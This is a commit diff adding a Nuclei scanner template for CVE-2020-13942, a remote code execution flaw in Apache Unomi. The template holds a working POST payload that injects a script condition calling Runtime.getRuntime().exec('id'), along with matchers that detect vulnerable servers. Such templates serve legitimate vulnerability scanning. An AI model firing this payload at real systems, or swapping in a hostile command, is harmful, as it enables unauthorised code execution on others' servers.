🔥 Add CVE-2020-13942

cves/CVE-2020-13942.yaml

@@ -0,0 +1,60 @@
+id: cve-2020-13942
+
+info:
+  name: Apache Unomi Remote Code Execution
+  author: dwisiswant0
+  severity: critical
+  description: |
+    Remote Code Execution in Apache Unomi.
+    Apache Unomi allows conditions to use OGNL and MVEL scripting which
+    offers the possibility to call static Java classes from the JDK
+    that could execute code with the permission level of the running Java process.
+    This vulnerability affects all versions of Apache Unomi prior to 1.5.2. Apache Unomi users should upgrade to 1.5.2 or later.
+
+    References:
+    - https://securityboulevard.com/2020/11/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/
+    - https://twitter.com/chybeta/status/1328912309440311297
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/context.json"
+      - "{{BaseURL}}:8181/context.json"
+    headers:
+      Content-Type: application/json
+    body: |
+      {
+        "filters": [
+          {
+            "id": "nuclei",
+            "filters": [
+              {
+                "condition": {
+                  "parameterValues": {
+                    "nuclei": "script::Runtime.getRuntime().exec('id')"
+                  },
+                  "type": "profilePropertyCondition"
+                }
+              }
+            ]
+          }
+        ],
+        "sessionId": "nuclei"
+      }
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "application/json"
+          - "context-profile-id"
+        condition: and
+        part: header
+      - type: regex
+        regex:
+          - "(profile|session)(Id|Properties|Segments)"
+          - "[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}"
+        condition: and
+        part: body